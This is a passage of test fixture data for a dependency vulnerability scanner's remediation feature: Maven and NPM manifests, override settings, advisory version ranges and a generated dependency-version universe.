"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] } ] } ================================================ FILE: internal/remediation/testdata/override-workaround/commons/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/override-workaround/commons/pom.xml ================================================ 4.0.0 dev.osv osv-fix 1 commons-beanutils commons-beanutils 20020520 commons-httpclient commons-httpclient 3.0 ================================================ FILE: internal/remediation/testdata/override-workaround/guava/android-to-android/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/override-workaround/guava/android-to-android/pom.xml ================================================ 4.0.0 dev.osv osv-fix 1 com.google.guava guava 22.0-android ================================================ FILE: internal/remediation/testdata/override-workaround/guava/jre-to-jre/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/override-workaround/guava/jre-to-jre/pom.xml ================================================ 4.0.0 dev.osv osv-fix 1 com.google.guava guava 23.1-jre ================================================ FILE: internal/remediation/testdata/override-workaround/guava/none-to-jre/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/override-workaround/guava/none-to-jre/pom.xml ================================================ 4.0.0 dev.osv osv-fix 1 com.google.guava guava 20.0 ================================================ FILE: internal/remediation/testdata/override-workaround/universe.yaml ================================================ system: Maven schema: | com.google.guava:guava 20.0 21.0 22.0 22.0-android 23.0 23.0-android 23.1-android 23.1-jre 24.0-android 24.0-jre commons-beanutils:commons-beanutils 1.0 1.2 1.9.0 1.9.3 1.9.4 20020520 20021128.082114 20030211.134440 commons-httpclient:commons-httpclient 2.0.2 3.0 3.1 20020423 ================================================ FILE: internal/remediation/testdata/override-workaround/vulns.json ================================================ { "vulns": [ { "id": "OSV-000-000", "affected": [ { "package": { "ecosystem": "Maven", "name": "com.google.guava:guava" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "24.0-android" } ] } ], "versions": [ "20.0", "21.0", "22.0", "22.0-android", "23.0", "23.0-android", "23.1-android", "23.1-jre" ] } ] }, { "id": "GHSA-6phf-73q6-gh87", "affected": [ { "package": { "ecosystem": "Maven", "name": "commons-beanutils:commons-beanutils" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.9.4" }, { "introduced": "20020520" } ] } ], "versions": [ "1.0", "1.2", "1.9.0", "1.9.3", "20020520", "20021128.082114", "20030211.134440" ] } ] }, { "id": "GHSA-3832-9276-x7gf", "affected": [ { "package": { "ecosystem": "Maven", "name": "commons-httpclient:commons-httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0" }, { "fixed": "4.0" } ] } ], "versions": [ "3.0", "3.1" ] } ] } ] } ================================================ FILE: internal/remediation/testdata/santatracker/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: internal/remediation/testdata/santatracker/package.json ================================================ { "name": "santatracker", "version": "2021.1.0", "license": "Apache-2.0", "scripts": { "dev": "npm run start", "start": "./serve.js", "release": "./release.js", "test": "mocha-headless-server src/api/test.html", "staging-check": "node .cloudbuild/staging-check.js", "postinstall": "ln -s ../node_modules static/node_modules || true" }, "dependencies": { "@babel/core": "^7.6.0", "@babel/preset-env": "^7.6.0", "@rollup/plugin-commonjs": "^21.0.1", "@rollup/plugin-node-resolve": "^13.0.6", "@webcomponents/webcomponentsjs": "^2.4.0", "autoprefixer": "^9.3.0", "babel-plugin-func-wrap": "^1.1.0", "chai": "^4.2.0", "chalk": "^2.4.2", "clipboardy": "^2.1.0", "core-js": "^3.3.2", "custom-event-polyfill": "^1.0.7", "dat.gui": "^0.7.3", "dhost": "^0.1.9", "esm-resolve": "^1.0.6", "event-target": "^1.2.3", "fancy-log": "^1.3.2", "fast-async": "^6.3.8", "firebase": "^8.10.0", "git-last-commit": "^1.0.1", "google-closure-compiler": "^20190909.0.0", "google-closure-library": "^20190909.0.0", "html-entities": "^1.2.1", "html-minifier": "^4.0.0", "html-modules-polyfill": "^0.1.0", "iframe-load": "^0.1.4", "jquery": "^3.5.0", "jsdom": "^12.2.0", "json5": "^2.1.0", "lit-element": "^2.2.1", "lottie-web": "^5.5.10", "mime-types": "^2.1.21", "mocha": "^5.2.0", "mocha-headless-server": "^0.1.2", "parse5": "^5.1.0", "polka": "^0.5.2", "pretty-ms": "^4.0.0", "regenerator-runtime": "^0.13.3", "rimraf": "^3.0.2", "rollup": "^2.59.0", "sass": "^1.22.9", "terser": "^3.10.11", "tmp": "^0.0.33", "unistore": "^3.4.1", "web-animations-js": "^2.3.1", "whatwg-fetch": "^3.0.0", "yargs": "^12.0.2" }, "devDependencies": { "@google-cloud/cloudbuild": "^2.6.0", "@google-cloud/error-reporting": "^2.0.4" } } ================================================ FILE: internal/remediation/testdata/santatracker/universe.yaml ================================================ # Automatically generated by generate_mock_resolution_universe on 06 Nov 25 09:04 AEDT. DO NOT EDIT. system: NPM schema: | @arr/every 1.0.0 1.0.1 @babel/code-frame 7.0.0 @babel/highlight@^7.0.0 7.5.5 @babel/highlight@^7.0.0 7.27.1 @babel/helper-validator-identifier@^7.27.1 js-tokens@^4.0.0 picocolors@^1.1.1 @babel/compat-data 7.28.5 @babel/core 7.6.0 @babel/code-frame@^7.5.5 @babel/generator@^7.6.0 @babel/helpers@^7.6.0 @babel/parser@^7.6.0 @babel/template@^7.6.0 @babel/traverse@^7.6.0 @babel/types@^7.6.0 convert-source-map@^1.1.0 debug@^4.1.0 json5@^2.1.0 lodash@^4.17.13 resolve@^1.3.2 semver@^5.4.1 source-map@^0.5.0 7.28.4 @babel/code-frame@^7.27.1 @babel/generator@^7.28.3 @babel/helper-compilation-targets@^7.27.2 @babel/helper-module-transforms@^7.28.3 @babel/helpers@^7.28.4 @babel/parser@^7.28.4 @babel/template@^7.27.2 @babel/traverse@^7.28.4 @babel/types@^7.28.4 @jridgewell/remapping@^2.3.5 convert-source-map@^2.0.0 debug@^4.1.0 gensync@^1.0.0-beta.2 json5@^2.2.3 semver@^6.3.1 @babel/generator 7.6.0 @babel/types@^7.6.0 jsesc@^2.5.1 lodash@^4.17.13 source-map@^0.5.0 trim-right@^1.0.1 7.28.5 @babel/parser@^7.28.5 @babel/types@^7.28.5 @jridgewell/gen-mapping@^0.3.12 @jridgewell/trace-mapping@^0.3.28 jsesc@^3.0.2 @babel/helper-annotate-as-pure 7.0.0 @babel/types@^7.0.0 7.27.3 @babel/types@^7.27.3 @babel/helper-builder-binary-assignment-operator-visitor 7.1.0 @babel/helper-explode-assignable-expression@^7.1.0 @babel/types@^7.0.0 @babel/helper-call-delegate 7.4.4 @babel/helper-hoist-variables@^7.4.4 @babel/traverse@^7.4.4 @babel/types@^7.4.4 @babel/helper-compilation-targets 7.27.2 @babel/compat-data@^7.27.2 @babel/helper-validator-option@^7.27.1 browserslist@^4.24.0 lru-cache@^5.1.1 semver@^6.3.1 @babel/helper-create-class-features-plugin 7.28.5 Scope peer|@babel/core@^7.0.0 @babel/helper-annotate-as-pure@^7.27.3 @babel/helper-member-expression-to-functions@^7.28.5 @babel/helper-optimise-call-expression@^7.27.1 @babel/helper-replace-supers@^7.27.1 @babel/helper-skip-transparent-expression-wrappers@^7.27.1 @babel/traverse@^7.28.5 semver@^6.3.1 @babel/helper-create-regexp-features-plugin 7.28.5 Scope peer|@babel/core@^7.0.0 @babel/helper-annotate-as-pure@^7.27.3 regexpu-core@^6.3.1 semver@^6.3.1 @babel/helper-define-map 7.5.5 @babel/helper-function-name@^7.1.0 @babel/types@^7.5.5 lodash@^4.17.13 @babel/helper-define-polyfill-provider 0.6.5 Scope peer|@babel/core@^7.4.0 || ^8.0.0-0 <8.0.0 @babel/helper-compilation-targets@^7.27.2 @babel/helper-plugin-utils@^7.27.1 debug@^4.4.1 lodash.debounce@^4.0.8 resolve@^1.22.10 @babel/helper-explode-assignable-expression 7.1.0 @babel/traverse@^7.1.0 @babel/types@^7.0.0 @babel/helper-function-name 7.1.0 @babel/helper-get-function-arity@^7.0.0 @babel/template@^7.1.0 @babel/types@^7.0.0 @babel/helper-get-function-arity 7.0.0 @babel/types@^7.0.0 @babel/helper-globals 7.28.0 @babel/helper-hoist-variables 7.4.4 @babel/types@^7.4.4 @babel/helper-member-expression-to-functions 7.5.5 @babel/types@^7.5.5 7.28.5 @babel/traverse@^7.28.5 @babel/types@^7.28.5 @babel/helper-module-imports 7.0.0 @babel/types@^7.0.0 7.27.1 @babel/traverse@^7.27.1 @babel/types@^7.27.1 @babel/helper-module-transforms 7.5.5 @babel/helper-module-imports@^7.0.0 @babel/helper-simple-access@^7.1.0 @babel/helper-split-export-declaration@^7.4.4 @babel/template@^7.4.4 @babel/types@^7.5.5 lodash@^4.17.13 7.28.3 Scope peer|@babel/core@^7.0.0 @babel/helper-module-imports@^7.27.1 @babel/helper-validator-identifier@^7.27.1 @babel/traverse@^7.28.3 @babel/helper-optimise-call-expression 7.0.0 @babel/types@^7.0.0 7.27.1 @babel/types@^7.27.1 @babel/helper-plugin-utils 7.0.0 7.27.1 @babel/helper-regex 7.5.5 lodash@^4.17.13 @babel/helper-remap-async-to-generator 7.1.0 @babel/helper-annotate-as-pure@^7.0.0 @babel/helper-wrap-function@^7.1.0 @babel/template@^7.1.0 @babel/traverse@^7.1.0 @babel/types@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-annotate-as-pure@^7.27.1 @babel/helper-wrap-function@^7.27.1 @babel/traverse@^7.27.1 @babel/helper-replace-supers 7.5.5 @babel/helper-member-expression-to-functions@^7.5.5 @babel/helper-optimise-call-expression@^7.0.0 @babel/traverse@^7.5.5 @babel/types@^7.5.5 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-member-expression-to-functions@^7.27.1 @babel/helper-optimise-call-expression@^7.27.1 @babel/traverse@^7.27.1 @babel/helper-simple-access 7.1.0 @babel/template@^7.1.0 @babel/types@^7.0.0 @babel/helper-skip-transparent-expression-wrappers 7.27.1 @babel/traverse@^7.27.1 @babel/types@^7.27.1 @babel/helper-split-export-declaration 7.4.4 @babel/types@^7.4.4 @babel/helper-string-parser 7.27.1 @babel/helper-validator-identifier 7.28.5 @babel/helper-validator-option 7.27.1 @babel/helper-wrap-function 7.2.0 @babel/helper-function-name@^7.1.0 @babel/template@^7.1.0 @babel/traverse@^7.1.0 @babel/types@^7.2.0 7.28.3 @babel/template@^7.27.2 @babel/traverse@^7.28.3 @babel/types@^7.28.2 @babel/helpers 7.6.0 @babel/template@^7.6.0 @babel/traverse@^7.6.0 @babel/types@^7.6.0 7.6.2 @babel/template@^7.6.0 @babel/traverse@^7.6.2 @babel/types@^7.6.0 7.7.0 @babel/template@^7.7.0 @babel/traverse@^7.7.0 @babel/types@^7.7.0 7.7.4 @babel/template@^7.7.4 @babel/traverse@^7.7.4 @babel/types@^7.7.4 7.8.0 @babel/template@^7.8.0 @babel/traverse@^7.8.0 @babel/types@^7.8.0 7.8.3 @babel/template@^7.8.3 @babel/traverse@^7.8.3 @babel/types@^7.8.3 7.8.4 @babel/template@^7.8.3 @babel/traverse@^7.8.4 @babel/types@^7.8.3 7.9.0 @babel/template@^7.8.3 @babel/traverse@^7.9.0 @babel/types@^7.9.0 7.9.2 @babel/template@^7.8.3 @babel/traverse@^7.9.0 @babel/types@^7.9.0 7.9.6 @babel/template@^7.8.3 @babel/traverse@^7.9.6 @babel/types@^7.9.6 7.10.0 @babel/template@^7.10.0 @babel/traverse@^7.10.0 @babel/types@^7.10.0 7.10.1 @babel/template@^7.10.1 @babel/traverse@^7.10.1 @babel/types@^7.10.1 7.10.4 @babel/template@^7.10.4 @babel/traverse@^7.10.4 @babel/types@^7.10.4 7.12.1 @babel/template@^7.10.4 @babel/traverse@^7.12.1 @babel/types@^7.12.1 7.12.5 @babel/template@^7.10.4 @babel/traverse@^7.12.5 @babel/types@^7.12.5 7.12.13 @babel/template@^7.12.13 @babel/traverse@^7.12.13 @babel/types@^7.12.13 7.12.17 @babel/template@^7.12.13 @babel/traverse@^7.12.17 @babel/types@^7.12.17 7.13.0 @babel/template@^7.12.13 @babel/traverse@^7.13.0 @babel/types@^7.13.0 7.13.10 @babel/template@^7.12.13 @babel/traverse@^7.13.0 @babel/types@^7.13.0 7.13.16 @babel/template@^7.12.13 @babel/traverse@^7.13.15 @babel/types@^7.13.16 7.13.17 @babel/template@^7.12.13 @babel/traverse@^7.13.17 @babel/types@^7.13.17 7.14.0 @babel/template@^7.12.13 @babel/traverse@^7.14.0 @babel/types@^7.14.0 7.14.5 @babel/template@^7.14.5 @babel/traverse@^7.14.5 @babel/types@^7.14.5 7.14.6 @babel/template@^7.14.5 @babel/traverse@^7.14.5 @babel/types@^7.14.5 7.14.8 @babel/template@^7.14.5 @babel/traverse@^7.14.8 @babel/types@^7.14.8 7.15.3 @babel/template@^7.14.5 @babel/traverse@^7.15.0 @babel/types@^7.15.0 7.15.4 @babel/template@^7.15.4 @babel/traverse@^7.15.4 @babel/types@^7.15.4 7.16.0 @babel/template@^7.16.0 @babel/traverse@^7.16.0 @babel/types@^7.16.0 7.16.3 @babel/template@^7.16.0 @babel/traverse@^7.16.3 @babel/types@^7.16.0 7.16.5 @babel/template@^7.16.0 @babel/traverse@^7.16.5 @babel/types@^7.16.0 7.16.7 @babel/template@^7.16.7 @babel/traverse@^7.16.7 @babel/types@^7.16.7 7.17.0 @babel/template@^7.16.7 @babel/traverse@^7.17.0 @babel/types@^7.17.0 7.17.2 @babel/template@^7.16.7 @babel/traverse@^7.17.0 @babel/types@^7.17.0 7.17.7 @babel/template@^7.16.7 @babel/traverse@^7.17.3 @babel/types@^7.17.0 7.17.8 @babel/template@^7.16.7 @babel/traverse@^7.17.3 @babel/types@^7.17.0 7.17.9 @babel/template@^7.16.7 @babel/traverse@^7.17.9 @babel/types@^7.17.0 7.18.0 @babel/template@^7.16.7 @babel/traverse@^7.18.0 @babel/types@^7.18.0 7.18.2 @babel/template@^7.16.7 @babel/traverse@^7.18.2 @babel/types@^7.18.2 7.18.6 @babel/template@^7.18.6 @babel/traverse@^7.18.6 @babel/types@^7.18.6 7.18.9 @babel/template@^7.18.6 @babel/traverse@^7.18.9 @babel/types@^7.18.9 7.19.0 @babel/template@^7.18.10 @babel/traverse@^7.19.0 @babel/types@^7.19.0 7.19.4 @babel/template@^7.18.10 @babel/traverse@^7.19.4 @babel/types@^7.19.4 7.20.0 @babel/template@^7.18.10 @babel/traverse@^7.20.0 @babel/types@^7.20.0 7.20.1 @babel/template@^7.18.10 @babel/traverse@^7.20.1 @babel/types@^7.20.0 7.20.5 @babel/template@^7.18.10 @babel/traverse@^7.20.5 @babel/types@^7.20.5 7.20.6 @babel/template@^7.18.10 @babel/traverse@^7.20.5 @babel/types@^7.20.5 7.20.7 @babel/template@^7.20.7 @babel/traverse@^7.20.7 @babel/types@^7.20.7 7.20.13 @babel/template@^7.20.7 @babel/traverse@^7.20.13 @babel/types@^7.20.7 7.21.0 @babel/template@^7.20.7 @babel/traverse@^7.21.0 @babel/types@^7.21.0 7.21.5 @babel/template@^7.20.7 @babel/traverse@^7.21.5 @babel/types@^7.21.5 7.22.0 @babel/template@^7.21.9 @babel/traverse@^7.22.0 @babel/types@^7.22.0 7.22.3 @babel/template@^7.21.9 @babel/traverse@^7.22.1 @babel/types@^7.22.3 7.22.5 @babel/template@^7.22.5 @babel/traverse@^7.22.5 @babel/types@^7.22.5 7.22.6 @babel/template@^7.22.5 @babel/traverse@^7.22.6 @babel/types@^7.22.5 7.22.10 @babel/template@^7.22.5 @babel/traverse@^7.22.10 @babel/types@^7.22.10 7.22.11 @babel/template@^7.22.5 @babel/traverse@^7.22.11 @babel/types@^7.22.11 7.22.15 @babel/template@^7.22.15 @babel/traverse@^7.22.15 @babel/types@^7.22.15 7.23.0 @babel/template@^7.22.15 @babel/traverse@^7.23.0 @babel/types@^7.23.0 7.23.1 @babel/template@^7.22.15 @babel/traverse@^7.23.0 @babel/types@^7.23.0 7.23.2 @babel/template@^7.22.15 @babel/traverse@^7.23.2 @babel/types@^7.23.0 7.23.4 @babel/template@^7.22.15 @babel/traverse@^7.23.4 @babel/types@^7.23.4 7.23.5 @babel/template@^7.22.15 @babel/traverse@^7.23.5 @babel/types@^7.23.5 7.23.6 @babel/template@^7.22.15 @babel/traverse@^7.23.6 @babel/types@^7.23.6 7.23.7 @babel/template@^7.22.15 @babel/traverse@^7.23.7 @babel/types@^7.23.6 7.23.8 @babel/template@^7.22.15 @babel/traverse@^7.23.7 @babel/types@^7.23.6 7.23.9 @babel/template@^7.23.9 @babel/traverse@^7.23.9 @babel/types@^7.23.9 7.24.0 @babel/template@^7.24.0 @babel/traverse@^7.24.0 @babel/types@^7.24.0 7.24.1 @babel/template@^7.24.0 @babel/traverse@^7.24.1 @babel/types@^7.24.0 7.24.4 @babel/template@^7.24.0 @babel/traverse@^7.24.1 @babel/types@^7.24.0 7.24.5 @babel/template@^7.24.0 @babel/traverse@^7.24.5 @babel/types@^7.24.5 7.24.6 @babel/template@^7.24.6 @babel/types@^7.24.6 7.24.7 @babel/template@^7.24.7 @babel/types@^7.24.7 7.24.8 @babel/template@^7.24.7 @babel/types@^7.24.8 7.25.0 @babel/template@^7.25.0 @babel/types@^7.25.0 7.25.6 @babel/template@^7.25.0 @babel/types@^7.25.6 7.25.7 @babel/template@^7.25.7 @babel/types@^7.25.7 7.25.9 @babel/template@^7.25.9 @babel/types@^7.25.9 7.26.0 @babel/template@^7.25.9 @babel/types@^7.26.0 7.26.7 @babel/template@^7.25.9 @babel/types@^7.26.7 7.26.9 @babel/template@^7.26.9 @babel/types@^7.26.9 7.26.10 @babel/template@^7.26.9 @babel/types@^7.26.10 7.27.0 @babel/template@^7.27.0 @babel/types@^7.27.0 7.27.1 @babel/template@^7.27.1 @babel/types@^7.27.1 7.27.3 @babel/template@^7.27.2 @babel/types@^7.27.3 7.27.4 @babel/template@^7.27.2 @babel/types@^7.27.3 7.27.6 @babel/template@^7.27.2 @babel/types@^7.27.6 7.28.2 @babel/template@^7.27.2 @babel/types@^7.28.2 7.28.3 @babel/template@^7.27.2 @babel/types@^7.28.2 7.28.4 @babel/template@^7.27.2 @babel/types@^7.28.4 @babel/highlight 7.0.0 chalk@^2.0.0 esutils@^2.0.2 js-tokens@^4.0.0 @babel/parser 7.1.2 7.6.0 7.28.5 @babel/types@^7.28.5 @babel/plugin-bugfix-firefox-class-in-computed-class-key 7.28.5 Scope peer|@babel/core@^7.0.0 @babel/helper-plugin-utils@^7.27.1 @babel/traverse@^7.28.5 @babel/plugin-bugfix-safari-class-field-initializer-scope 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining 7.27.1 Scope peer|@babel/core@^7.13.0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-skip-transparent-expression-wrappers@^7.27.1 @babel/plugin-transform-optional-chaining@^7.27.1 @babel/plugin-bugfix-v8-static-class-fields-redefine-readonly 7.28.3 Scope peer|@babel/core@^7.0.0 @babel/helper-plugin-utils@^7.27.1 @babel/traverse@^7.28.3 @babel/plugin-proposal-async-generator-functions 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-remap-async-to-generator@^7.1.0 @babel/plugin-syntax-async-generators@^7.2.0 @babel/plugin-proposal-dynamic-import 7.5.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-dynamic-import@^7.2.0 @babel/plugin-proposal-json-strings 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-json-strings@^7.2.0 @babel/plugin-proposal-object-rest-spread 7.5.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-object-rest-spread@^7.2.0 @babel/plugin-proposal-optional-catch-binding 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-optional-catch-binding@^7.2.0 @babel/plugin-proposal-private-property-in-object 7.21.0-placeholder-for-preset-env.2 Scope peer|@babel/core@^7.0.0-0 @babel/plugin-proposal-unicode-property-regex 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-regex@^7.4.4 regexpu-core@^4.5.4 @babel/plugin-syntax-async-generators 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-dynamic-import 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-import-assertions 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-syntax-import-attributes 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-syntax-json-strings 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-object-rest-spread 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-optional-catch-binding 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/plugin-syntax-unicode-sets-regex 7.18.6 Scope peer|@babel/core@^7.0.0 @babel/helper-create-regexp-features-plugin@^7.18.6 @babel/helper-plugin-utils@^7.18.6 @babel/plugin-transform-arrow-functions 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-async-generator-functions 7.28.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-remap-async-to-generator@^7.27.1 @babel/traverse@^7.28.0 @babel/plugin-transform-async-to-generator 7.5.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-imports@^7.0.0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-remap-async-to-generator@^7.1.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-imports@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/helper-remap-async-to-generator@^7.27.1 @babel/plugin-transform-block-scoped-functions 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-block-scoping 7.6.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 lodash@^4.17.13 7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-class-properties 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-create-class-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-class-static-block 7.28.3 Scope peer|@babel/core@^7.12.0 @babel/helper-create-class-features-plugin@^7.28.3 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-classes 7.5.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-annotate-as-pure@^7.0.0 @babel/helper-define-map@^7.5.5 @babel/helper-function-name@^7.1.0 @babel/helper-optimise-call-expression@^7.0.0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-replace-supers@^7.5.5 @babel/helper-split-export-declaration@^7.4.4 globals@^11.1.0 7.28.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-annotate-as-pure@^7.27.3 @babel/helper-compilation-targets@^7.27.2 @babel/helper-globals@^7.28.0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-replace-supers@^7.27.1 @babel/traverse@^7.28.4 @babel/plugin-transform-computed-properties 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/template@^7.27.1 @babel/plugin-transform-destructuring 7.6.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/traverse@^7.28.5 @babel/plugin-transform-dotall-regex 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 @babel/helper-regex@^7.4.4 regexpu-core@^4.5.4 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-duplicate-keys 7.5.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-duplicate-named-capturing-groups-regex 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-dynamic-import 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-explicit-resource-management 7.28.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-destructuring@^7.28.0 @babel/plugin-transform-exponentiation-operator 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-builder-binary-assignment-operator-visitor@^7.1.0 @babel/helper-plugin-utils@^7.0.0 7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-export-namespace-from 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-for-of 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/helper-skip-transparent-expression-wrappers@^7.27.1 @babel/plugin-transform-function-name 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-function-name@^7.1.0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-compilation-targets@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/traverse@^7.27.1 @babel/plugin-transform-json-strings 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-literals 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-logical-assignment-operators 7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-member-expression-literals 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-modules-amd 7.5.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.1.0 @babel/helper-plugin-utils@^7.0.0 babel-plugin-dynamic-import-node@^2.3.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-modules-commonjs 7.6.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.4.4 @babel/helper-plugin-utils@^7.0.0 @babel/helper-simple-access@^7.1.0 babel-plugin-dynamic-import-node@^2.3.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-modules-systemjs 7.5.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-hoist-variables@^7.4.4 @babel/helper-plugin-utils@^7.0.0 babel-plugin-dynamic-import-node@^2.3.0 7.28.5 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.28.3 @babel/helper-plugin-utils@^7.27.1 @babel/helper-validator-identifier@^7.28.5 @babel/traverse@^7.28.5 @babel/plugin-transform-modules-umd 7.2.0 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.1.0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-module-transforms@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-named-capturing-groups-regex 7.6.0 Scope peer|@babel/core@^7.0.0 regexp-tree@^0.1.13 7.27.1 Scope peer|@babel/core@^7.0.0 @babel/helper-create-regexp-features-plugin@^7.27.1 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-new-target 7.4.4 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.0.0 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-nullish-coalescing-operator 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-numeric-separator 7.27.1 Scope peer|@babel/core@^7.0.0-0 @babel/helper-plugin-utils@^7.27.1 @babel/plugin-transform-object-rest-spread 7.28.4 Scope peer|@babel/core@^7.0.0-0 